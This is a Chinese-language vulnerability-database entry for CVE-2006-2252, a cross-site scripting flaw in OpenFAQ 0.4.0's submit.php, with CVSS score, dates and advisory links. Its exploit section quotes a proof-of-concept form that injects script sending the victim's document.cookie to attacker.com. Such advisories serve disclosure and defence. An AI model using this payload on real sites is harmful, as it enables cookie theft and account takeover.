OpenFAQ submit.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110219 漏洞类型 跨站脚本
发布时间 2006-05-06 更新时间 2006-05-09
CVE编号 CVE-2006-2252 CNNVD-ID CNNVD-200605-153
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/27821
https://cxsecurity.com/issue/WLB-2006050047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-153
|漏洞详情
OpenFAQ0.4.0中的submit.php存在跨站脚本攻击漏洞,远程攻击者可通过q参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/17860/info

OpenFAQ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Example exploit: <form action=http://host/openfaq-0.4.0/submit.php?ask=go method=post> <input type=text name=q value="<SCRIPT>document.location='http://attacker.com/get.cgi? value='+escape(document.cookie)</SCRIPT>"> <input type=hidden name=email> <input type=submit value=Submit> </form>
|参考资料

来源:BID
名称:17860
链接:http://www.securityfocus.com/bid/17860
来源:BUGTRAQ
名称:20060506OpenFAQ-HTMLinjectionandXSS(CrossSiteScripting)
链接:http://www.securityfocus.com/archive/1/archive/1/433120/100/0/threaded
来源:VUPEN
名称:ADV-2006-1684
链接:http://www.frsirt.com/english/advisories/2006/1684
来源:SECUNIA
名称:20018
链接:http://secunia.com/advisories/20018
来源:XF
名称:openfaq-submit-xss(26286)
链接:http://xforce.iss.net/xforce/xfdb/26286
来源:OSVDB
名称:25350
链接:http://www.osvdb.org/25350
来源:SREASON
名称:850
链接:http://securityreason.com/securityalert/850